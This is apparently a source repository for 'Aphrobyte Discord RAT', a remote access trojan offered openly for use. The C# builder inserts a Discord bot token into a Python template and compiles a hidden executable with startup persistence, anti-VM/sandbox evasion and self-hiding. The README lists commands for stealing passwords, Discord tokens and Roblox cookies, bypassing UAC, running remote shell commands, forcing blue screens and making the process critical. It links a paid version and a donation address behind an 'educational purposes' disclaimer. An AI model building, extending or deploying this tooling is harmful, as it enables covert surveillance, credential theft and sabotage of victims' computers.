9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 97 | this.label2.ForeColor = System.Drawing.SystemColors.ButtonFace; 98 | this.label2.Location = new System.Drawing.Point(11, 73); 99 | this.label2.Name = "label2"; 100 | this.label2.Size = new System.Drawing.Size(63, 16); 101 | this.label2.TabIndex = 4; 102 | this.label2.Text = "Bot token"; 103 | // 104 | // textBox2 105 | // 106 | this.textBox2.Font = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 107 | this.textBox2.Location = new System.Drawing.Point(138, 69); 108 | this.textBox2.Name = "textBox2"; 109 | this.textBox2.Size = new System.Drawing.Size(169, 20); 110 | this.textBox2.TabIndex = 3; 111 | // 112 | // label3 113 | // 114 | this.label3.AutoSize = true; 115 | this.label3.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 116 | this.label3.ForeColor = System.Drawing.SystemColors.ButtonFace; 117 | this.label3.Location = new System.Drawing.Point(11, 112); 118 | this.label3.Name = "label3"; 119 | this.label3.Size = new System.Drawing.Size(107, 16); 120 | this.label3.TabIndex = 6; 121 | this.label3.Text = "Alerts channel ID"; 122 | // 123 | // textBox3 124 | // 125 | this.textBox3.Font = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 126 | this.textBox3.Location = new System.Drawing.Point(138, 108); 127 | this.textBox3.Name = "textBox3"; 128 | this.textBox3.Size = new System.Drawing.Size(169, 20); 129 | this.textBox3.TabIndex = 5; 130 | // 131 | // panel1 132 | // 133 | this.panel1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(40)))), ((int)(((byte)(40))))); 134 | this.panel1.Controls.Add(this.textBox1); 135 | this.panel1.Controls.Add(this.label3); 136 | 
this.panel1.Controls.Add(this.label1); 137 | this.panel1.Controls.Add(this.textBox3); 138 | this.panel1.Controls.Add(this.textBox2); 139 | this.panel1.Controls.Add(this.label2); 140 | this.panel1.Location = new System.Drawing.Point(12, 155); 141 | this.panel1.Name = "panel1"; 142 | this.panel1.Size = new System.Drawing.Size(320, 169); 143 | this.panel1.TabIndex = 7; 144 | // 145 | // label4 146 | // 147 | this.label4.AutoSize = true; 148 | this.label4.Font = new System.Drawing.Font("Microsoft Sans Serif", 18F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 149 | this.label4.ForeColor = System.Drawing.SystemColors.ButtonFace; 150 | this.label4.Location = new System.Drawing.Point(33, 123); 151 | this.label4.Name = "label4"; 152 | this.label4.Size = new System.Drawing.Size(271, 29); 153 | this.label4.TabIndex = 7; 154 | this.label4.Text = "BOT CONFIGURATION"; 155 | // 156 | // label5 157 | // 158 | this.label5.AutoSize = true; 159 | this.label5.Font = new System.Drawing.Font("Microsoft Sans Serif", 18F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 160 | this.label5.ForeColor = System.Drawing.SystemColors.ButtonFace; 161 | this.label5.Location = new System.Drawing.Point(397, 123); 162 | this.label5.Name = "label5"; 163 | this.label5.Size = new System.Drawing.Size(356, 29); 164 | this.label5.TabIndex = 8; 165 | this.label5.Text = "BACKDOOR CONFIGURATION"; 166 | // 167 | // panel2 168 | // 169 | this.panel2.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(40)))), ((int)(((byte)(40))))); 170 | this.panel2.Controls.Add(this.checkBox4); 171 | this.panel2.Controls.Add(this.checkBox2); 172 | this.panel2.Controls.Add(this.checkBox1); 173 | this.panel2.Controls.Add(this.textBox5); 174 | this.panel2.Controls.Add(this.label7); 175 | this.panel2.Controls.Add(this.label8); 176 | this.panel2.Controls.Add(this.comboBox1); 177 | this.panel2.Controls.Add(this.label6); 178 | 
this.panel2.Controls.Add(this.textBox4); 179 | this.panel2.Location = new System.Drawing.Point(351, 155); 180 | this.panel2.Name = "panel2"; 181 | this.panel2.Size = new System.Drawing.Size(437, 275); 182 | this.panel2.TabIndex = 9; 183 | // 184 | // checkBox4 185 | // 186 | this.checkBox4.AutoSize = true; 187 | this.checkBox4.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F); 188 | this.checkBox4.ForeColor = System.Drawing.SystemColors.ButtonFace; 189 | this.checkBox4.Location = new System.Drawing.Point(117, 164); 190 | this.checkBox4.Name = "checkBox4"; 191 | this.checkBox4.Size = new System.Drawing.Size(144, 20); 192 | this.checkBox4.TabIndex = 17; 193 | this.checkBox4.Text = "Hide after execution"; 194 | this.checkBox4.UseVisualStyleBackColor = true; 195 | // 196 | // checkBox2 197 | // 198 | this.checkBox2.AutoSize = true; 199 | this.checkBox2.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F); 200 | this.checkBox2.ForeColor = System.Drawing.SystemColors.ButtonFace; 201 | this.checkBox2.Location = new System.Drawing.Point(117, 138); 202 | this.checkBox2.Name = "checkBox2"; 203 | this.checkBox2.Size = new System.Drawing.Size(135, 20); 204 | this.checkBox2.TabIndex = 15; 205 | this.checkBox2.Text = "Anti VM / Sandbox"; 206 | this.checkBox2.UseVisualStyleBackColor = true; 207 | // 208 | // checkBox1 209 | // 210 | this.checkBox1.AutoSize = true; 211 | this.checkBox1.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F); 212 | this.checkBox1.ForeColor = System.Drawing.SystemColors.ButtonFace; 213 | this.checkBox1.Location = new System.Drawing.Point(117, 112); 214 | this.checkBox1.Name = "checkBox1"; 215 | this.checkBox1.Size = new System.Drawing.Size(108, 20); 216 | this.checkBox1.TabIndex = 14; 217 | this.checkBox1.Text = "Add to startup"; 218 | this.checkBox1.UseVisualStyleBackColor = true; 219 | // 220 | // textBox5 221 | // 222 | this.textBox5.Font = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, 
System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 223 | this.textBox5.Location = new System.Drawing.Point(143, 57); 224 | this.textBox5.Name = "textBox5"; 225 | this.textBox5.Size = new System.Drawing.Size(216, 20); 226 | this.textBox5.TabIndex = 13; 227 | // 228 | // label7 229 | // 230 | this.label7.AutoSize = true; 231 | this.label7.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 232 | this.label7.ForeColor = System.Drawing.SystemColors.ButtonFace; 233 | this.label7.Location = new System.Drawing.Point(18, 234); 234 | this.label7.Name = "label7"; 235 | this.label7.Size = new System.Drawing.Size(116, 16); 236 | this.label7.TabIndex = 10; 237 | this.label7.Text = "Backdoor location"; 238 | // 239 | // label8 240 | // 241 | this.label8.AutoSize = true; 242 | this.label8.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 243 | this.label8.ForeColor = System.Drawing.SystemColors.ButtonFace; 244 | this.label8.Location = new System.Drawing.Point(18, 61); 245 | this.label8.Name = "label8"; 246 | this.label8.Size = new System.Drawing.Size(103, 16); 247 | this.label8.TabIndex = 12; 248 | this.label8.Text = "Backdoor name"; 249 | // 250 | // comboBox1 251 | // 252 | this.comboBox1.FormattingEnabled = true; 253 | this.comboBox1.Items.AddRange(new object[] { 254 | "\\\\AppData\\\\Roaming\\\\", 255 | "\\\\AppData\\\\Roaming\\\\Microsoft\\\\"}); 256 | this.comboBox1.Location = new System.Drawing.Point(161, 233); 257 | this.comboBox1.Name = "comboBox1"; 258 | this.comboBox1.Size = new System.Drawing.Size(124, 21); 259 | this.comboBox1.TabIndex = 9; 260 | // 261 | // label6 262 | // 263 | this.label6.AutoSize = true; 264 | this.label6.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, 
System.Drawing.GraphicsUnit.Point, ((byte)(0))); 265 | this.label6.ForeColor = System.Drawing.SystemColors.ButtonFace; 266 | this.label6.Location = new System.Drawing.Point(18, 18); 267 | this.label6.Name = "label6"; 268 | this.label6.Size = new System.Drawing.Size(94, 16); 269 | this.label6.TabIndex = 8; 270 | this.label6.Text = "Process name"; 271 | // 272 | // textBox4 273 | // 274 | this.textBox4.Font = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 275 | this.textBox4.Location = new System.Drawing.Point(143, 14); 276 | this.textBox4.Name = "textBox4"; 277 | this.textBox4.Size = new System.Drawing.Size(216, 20); 278 | this.textBox4.TabIndex = 7; 279 | // 280 | // button1 281 | // 282 | this.button1.Font = new System.Drawing.Font("Microsoft Sans Serif", 11.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 283 | this.button1.Location = new System.Drawing.Point(12, 374); 284 | this.button1.Name = "button1"; 285 | this.button1.Size = new System.Drawing.Size(180, 31); 286 | this.button1.TabIndex = 10; 287 | this.button1.Text = "Install requirements"; 288 | this.button1.UseVisualStyleBackColor = true; 289 | this.button1.Click += new System.EventHandler(this.button1_Click); 290 | // 291 | // button2 292 | // 293 | this.button2.Font = new System.Drawing.Font("Microsoft Sans Serif", 11.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 294 | this.button2.Location = new System.Drawing.Point(12, 422); 295 | this.button2.Name = "button2"; 296 | this.button2.Size = new System.Drawing.Size(180, 31); 297 | this.button2.TabIndex = 11; 298 | this.button2.Text = "Start compiling"; 299 | this.button2.UseVisualStyleBackColor = true; 300 | this.button2.Click += new System.EventHandler(this.button2_Click); 301 | // 302 | // checkBox5 303 | // 304 | this.checkBox5.AutoSize = true; 305 | this.checkBox5.Font = new 
System.Drawing.Font("Microsoft Sans Serif", 9.75F);
            this.checkBox5.ForeColor = System.Drawing.SystemColors.ButtonFace;
            this.checkBox5.Location = new System.Drawing.Point(210, 381);
            this.checkBox5.Name = "checkBox5";
            this.checkBox5.Size = new System.Drawing.Size(135, 20);
            this.checkBox5.TabIndex = 18;
            this.checkBox5.Text = "Upgrade modules";
            this.checkBox5.UseVisualStyleBackColor = true;
            // 
            // pictureBox2
            // 
            this.pictureBox2.BackgroundImageLayout = System.Windows.Forms.ImageLayout.None;
            this.pictureBox2.Image = ((System.Drawing.Image)(resources.GetObject("pictureBox2.Image")));
            this.pictureBox2.Location = new System.Drawing.Point(419, 441);
            this.pictureBox2.Name = "pictureBox2";
            this.pictureBox2.Size = new System.Drawing.Size(28, 31);
            this.pictureBox2.SizeMode = System.Windows.Forms.PictureBoxSizeMode.Zoom;
            this.pictureBox2.TabIndex = 19;
            this.pictureBox2.TabStop = false;
            // 
            // label9
            // 
            this.label9.AutoSize = true;
            this.label9.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Italic, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label9.ForeColor = System.Drawing.SystemColors.ButtonFace;
            this.label9.Location = new System.Drawing.Point(453, 449);
            this.label9.Name = "label9";
            this.label9.Size = new System.Drawing.Size(325, 16);
            this.label9.TabIndex = 20;
            this.label9.Text = "This project has been created by RIOT Administration";
            // 
            // Form1
            // 
            this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
            this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
            this.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(49)))), ((int)(((byte)(49)))), ((int)(((byte)(49)))));
            this.ClientSize = new System.Drawing.Size(799, 484);
            this.Controls.Add(this.label9);
            this.Controls.Add(this.pictureBox2);
            this.Controls.Add(this.checkBox5);
            this.Controls.Add(this.button2);
            this.Controls.Add(this.button1);
            this.Controls.Add(this.label5);
            this.Controls.Add(this.label4);
            this.Controls.Add(this.panel2);
            this.Controls.Add(this.panel1);
            this.Controls.Add(this.pictureBox1);
            this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.SizableToolWindow;
            this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
            this.Name = "Form1";
            this.Text = "Aphrobyte Discord RAT @ RIOT Administration";
            ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
            this.panel1.ResumeLayout(false);
            this.panel1.PerformLayout();
            this.panel2.ResumeLayout(false);
            this.panel2.PerformLayout();
            ((System.ComponentModel.ISupportInitialize)(this.pictureBox2)).EndInit();
            this.ResumeLayout(false);
            this.PerformLayout();

        }

        #endregion

        private System.Windows.Forms.PictureBox pictureBox1;
        private System.Windows.Forms.TextBox textBox1;
        private System.Windows.Forms.Label label1;
        private System.Windows.Forms.Label label2;
        private System.Windows.Forms.TextBox textBox2;
        private System.Windows.Forms.Label label3;
        private System.Windows.Forms.TextBox textBox3;
        private System.Windows.Forms.Panel panel1;
        private System.Windows.Forms.Label label4;
        private System.Windows.Forms.Label label5;
        private System.Windows.Forms.Panel panel2;
        private System.Windows.Forms.Label label6;
        private System.Windows.Forms.TextBox textBox4;
        private System.Windows.Forms.TextBox textBox5;
        private System.Windows.Forms.Label label7;
        private System.Windows.Forms.Label label8;
        private System.Windows.Forms.ComboBox comboBox1;
        private System.Windows.Forms.CheckBox checkBox4;
        private System.Windows.Forms.CheckBox checkBox2;
        private
System.Windows.Forms.CheckBox checkBox1;
        private System.Windows.Forms.Button button1;
        private System.Windows.Forms.Button button2;
        private System.Windows.Forms.CheckBox checkBox5;
        private System.Windows.Forms.PictureBox pictureBox2;
        private System.Windows.Forms.Label label9;
    }
}

--------------------------------------------------------------------------------
/Form1.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.IO;
using System.Windows.Forms;
using System.Diagnostics;

namespace aphrobyte_discord_rat
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        static void Compile(string guild_id, string bot_token, string alerts_id, string process_name, string backdoor_name, string backdoor_location, bool startup, bool antivm, bool hide)
        {
            if (Directory.Exists("dist"))
            {
                Directory.Delete("dist", true);
            }
            if (Directory.Exists("build"))
            {
                Directory.Delete("build", true);
            }
            if (Directory.Exists($"{backdoor_name}.spec"))
            {
                Directory.Delete($"{backdoor_name}.spec", true);
            }
            if (File.Exists(".buildmodules\\main.py"))
            {
                File.Delete(".buildmodules\\main.py");
            }

            if (!backdoor_name.EndsWith(".exe"))
            {
                backdoor_name = $"{backdoor_name}.exe";
            }

            string sample_path = ".buildmodules\\sample.py";
            File.Copy(sample_path, ".buildmodules\\main.py");
            File.Move(".buildmodules\\main.py", ".buildmodules\\main.py");

            string unconfigured = File.ReadAllText(".buildmodules\\main.py");
            unconfigured = unconfigured.Replace("{guildid}", guild_id);
            unconfigured = unconfigured.Replace("{token}", bot_token);
            unconfigured = unconfigured.Replace("{announcements}", alerts_id);
            unconfigured = unconfigured.Replace("{processname}", process_name);
            unconfigured = unconfigured.Replace("{backdoorlocation}", backdoor_location);
            unconfigured = unconfigured.Replace("\"{autostart}\"", startup.ToString());
            unconfigured = unconfigured.Replace("\"{antivm}\"", antivm.ToString());
            unconfigured = unconfigured.Replace("\"{hideafterexec}\"", hide.ToString());

            File.WriteAllText(".buildmodules\\main.py", unconfigured);

            ProcessStartInfo ps = new ProcessStartInfo();
            ps.FileName = "cmd.exe";
            ps.WindowStyle = ProcessWindowStyle.Normal;
            ps.Arguments = $"/c title \"Compiling configuration, please wait...\" && python -m PyInstaller --onefile --noconsole --name=\"{backdoor_name}\" .buildmodules\\main.py && title \"Backdoor compiled \" && move \"dist\\{backdoor_name}\" {backdoor_name} && echo . && pause";
            Process.Start(ps);
        }

        private void button2_Click(object sender, EventArgs e)
        {
            bool filledtextbox_1 = !string.IsNullOrWhiteSpace(textBox1.Text);
            bool filledtextbox_2 = !string.IsNullOrWhiteSpace(textBox2.Text);
            bool filledtextbox_3 = !string.IsNullOrWhiteSpace(textBox3.Text);
            bool filledtextbox_4 = !string.IsNullOrWhiteSpace(textBox4.Text);
            bool filledtextbox_5 = !string.IsNullOrWhiteSpace(textBox5.Text);
            bool combobox_selected = comboBox1.SelectedIndex != -1;

            if (filledtextbox_1 && filledtextbox_2 && filledtextbox_3 && filledtextbox_4 && filledtextbox_5 && combobox_selected)
            {
                string guildid = textBox1.Text;
                string bottoken = textBox2.Text;
                string alertsid = textBox3.Text;
                string processname = textBox4.Text;
                string backdoorname = textBox5.Text;
                string backdoorlocation = comboBox1.Text;
                bool startup = checkBox1.Checked;
                bool antivm = checkBox2.Checked;
                bool hide =
checkBox4.Checked;
                Compile(guildid, bottoken, alertsid, processname, backdoorname, backdoorlocation, startup, antivm, hide);

            } else
            {
                MessageBox.Show("Please complete every field and choose a backdoor location.", "Configuration incomplete", MessageBoxButtons.OK, MessageBoxIcon.Error);
            }
        }

        private void button1_Click(object sender, EventArgs e)
        {
            if (checkBox5.Checked != true)
            {
                ProcessStartInfo ps = new ProcessStartInfo();
                ps.FileName = "cmd.exe";
                ps.WindowStyle = ProcessWindowStyle.Normal;
                ps.Arguments = "/c title \"Installing requirements, please wait...\" && pip install -r .buildmodules\\requirements.txt && title \"Requirements installed\" && echo . && pause";
                Process.Start(ps);
            }
            else
            {
                ProcessStartInfo ps = new ProcessStartInfo();
                ps.FileName = "cmd.exe";
                ps.WindowStyle = ProcessWindowStyle.Normal;
                ps.Arguments = "/c title \"Installing and upgrading requirements, please wait...\" && pip install --upgrade pip && pip install --upgrade wheel && pip install --upgrade setuptools && pip install -U -r .buildmodules\\requirements.txt && title \"Requirements installed\" && echo . && pause";
                Process.Start(ps);
            }
        }
    }
}

--------------------------------------------------------------------------------
/Program.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace aphrobyte_discord_rat
{
    internal static class Program
    {
        ///
        /// The main entry point for the application.
        ///
        [STAThread]
        static void Main()
        {
            Application.EnableVisualStyles();
            Application.SetCompatibleTextRenderingDefault(false);
            Application.Run(new Form1());
        }
    }
}

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
![aphrobytelogo](https://user-images.githubusercontent.com/71534600/216463962-fa72bec6-c7b1-417e-9c1f-116346961b52.png)
# Aphrobyte RAT
> A powerful Remote Access Trojan that uses Discord as C2. This means you can control your devices through Discord.

# Aphrobyte Plus: https://rentry.co/aphrobyteplus-trojan

Telegram : https://t.me/riotadministration

## Installation
You can install the tool from [the latest release](https://github.com/Riot-Byte/aphrobyte-rat/releases/tag/v1.9.2).

## Current features

- Surveillance modules
- Fun modules
- Sanctioning
- Communication (chats with the infected user)
- Multiple agent handling (get multiple people at once)
- Persistence
- File management modules
- Information gathering
- Undetected by antivirus (sorry not anymore)

## Commands

- **!help** - Shows this message
- **!startup** - Adds the file to startup.
- **!exit** - Stop the RAT from working.
- **!usagelist** - Returns a list of active users.
- **!admin_check** - Checks if you are admin on target computer.
- **!bypass_uac** - Attempts to bypass UAC to get admin privileges.
- **!shell** - Run a shell command

### Surveillance

- **!screenshot** - Sends a screenshot of the target machine
- **!idletime** - Displays for how long the user has been AFK
- **!webcam_capture** - Capture a picture of the webcam.
- **!tasklist** - Returns a list of active tasks.

### File management

- **!chdir** - Changes the current directory. **!chdir <** to go back one directory.
- **!chdisk** - Changes the current disk. (E, C, D, etc.)
- **!ls** - Displays all items in the current directory.
- **!download** - Downloads a file from the specified path.
- **!upload** - Uploads a file to the specified path.
- **!taskkill** - Kills the specified task.
- **!startfile** - Starts a file.
- **!delfile** - Deletes a file.
- **!hidefile** \ **!unhidefile** - Hides/unhides a file.

### Information gathering

- **!whois** - Prints the user's name
- **!getip** - Gets the current user's IP address
- **!clipboard** - Returns a string of the user's clipboard.
- **!stealpasswords** - Steal all the passwords from the device.
- **!grabroblox** - Grabs the user's Roblox account cookie.
- **!hardware_list** - Lists the user's hardware on newlines.
- **!grabdiscord** - Fetches the user's Discord account token.

### Sanctioning

- **!bsod** - Blue screens the computer.
- **!disabletaskmgr** \ **!enabletaskmanager** - Disable/enable task manager.
- **!logoff** - Logs the user off.
- **!shutdown** - Shuts the user's PC off.
- **!restart** - Restarts the user's PC.
- **!blockscreen** - Blocks the user's screen. (IRREVERSIBLE UNTIL USER RESTARTS)
- **!critproc** - Makes the RAT a critical process, meaning if it's task killed the user will get a BSOD.
- **!screenflip** - Rotates the user's screen 90 degrees.

### Fun

- **!write** - Writes a sentence then presses enter.
- **!setclipboard** - Sets the clipboard to the specified string of text.
- **!forcedesktop** - Sends the user on desktop automatically.
- **!messmouse** - Shakes the user's cursor when they try to move the mouse, run this command again to stop.
- **!opensite** - Opens a site on the user's browser.
- **!key_press** - Press a key.
- **!showtaskbar** \ **!hidetaskbar**

### Communication

- **!questionmsg** - Sends the user a question message.
- **!warningmsg** - Sends the user a warning message.
- **!errormsg** - Sends the user an error message.
- **!infomsg** - Sends the user an informative message.

```
* You need to specify the usage ID after every command. Arguments come after. The usage ID will be sent at the start of every session.

Example : !write (usage-id) (sentence) => !write 123456 Test sentence
!questionmsg (usage-id) (message) => !questionmsg 123456 Test message
```

## Disclaimer
This tool was made for educational purposes only and self learning. The developer is not responsible for bad actions that originate from this tool.
Publishing this tool under your name will result in a DMCA takedown.

## BTC Donations : **bc1qzx8ex62q8ujs5ea62vkjfrye3khqtmdepgaxen**

--------------------------------------------------------------------------------
/aphrobyte-discord-rat.csproj:
--------------------------------------------------------------------------------
[XML element tags were lost in extraction; only the element values survive, in file order]
Debug
AnyCPU
{C04A8F04-BAA4-4743-BDE2-F042DB0BE037}
WinExe
aphrobyte_discord_rat
aphrobyte-discord-rat
v4.7.2
512
true
true

AnyCPU
true
full
false
bin\Debug\
DEBUG;TRACE
prompt
4

AnyCPU
pdbonly
true
bin\Release\
TRACE
prompt
4

aphrobytelogo.ico

Form

Form1.cs

Form1.cs

ResXFileCodeGenerator
Resources.Designer.cs
Designer

True
Resources.resx

SettingsSingleFileGenerator
Settings.Designer.cs

True
Settings.settings
True

--------------------------------------------------------------------------------
/aphrobyte-discord-rat.sln:
--------------------------------------------------------------------------------

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.6.33829.357
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "aphrobyte-discord-rat", "aphrobyte-discord-rat.csproj", "{C04A8F04-BAA4-4743-BDE2-F042DB0BE037}"
EndProject
Global
    GlobalSection(SolutionConfigurationPlatforms) = preSolution
        Debug|Any CPU = Debug|Any CPU
        Release|Any CPU = Release|Any CPU
    EndGlobalSection
    GlobalSection(ProjectConfigurationPlatforms) = postSolution
        {C04A8F04-BAA4-4743-BDE2-F042DB0BE037}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
        {C04A8F04-BAA4-4743-BDE2-F042DB0BE037}.Debug|Any CPU.Build.0 = Debug|Any CPU
        {C04A8F04-BAA4-4743-BDE2-F042DB0BE037}.Release|Any CPU.ActiveCfg = Release|Any CPU
        {C04A8F04-BAA4-4743-BDE2-F042DB0BE037}.Release|Any CPU.Build.0 = Release|Any CPU
    EndGlobalSection
    GlobalSection(SolutionProperties) = preSolution
        HideSolutionNode = FALSE
    EndGlobalSection
    GlobalSection(ExtensibilityGlobals) = postSolution
        SolutionGuid = {FA0C6F5F-AD52-49AD-8007-0C1B321870E1}
    EndGlobalSection
EndGlobal

--------------------------------------------------------------------------------
/aphrobytelogo.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Riot-Byte/aphrobyte-rat/5bf2b09f581506049818009aefadc3de43881a21/aphrobytelogo.ico
--------------------------------------------------------------------------------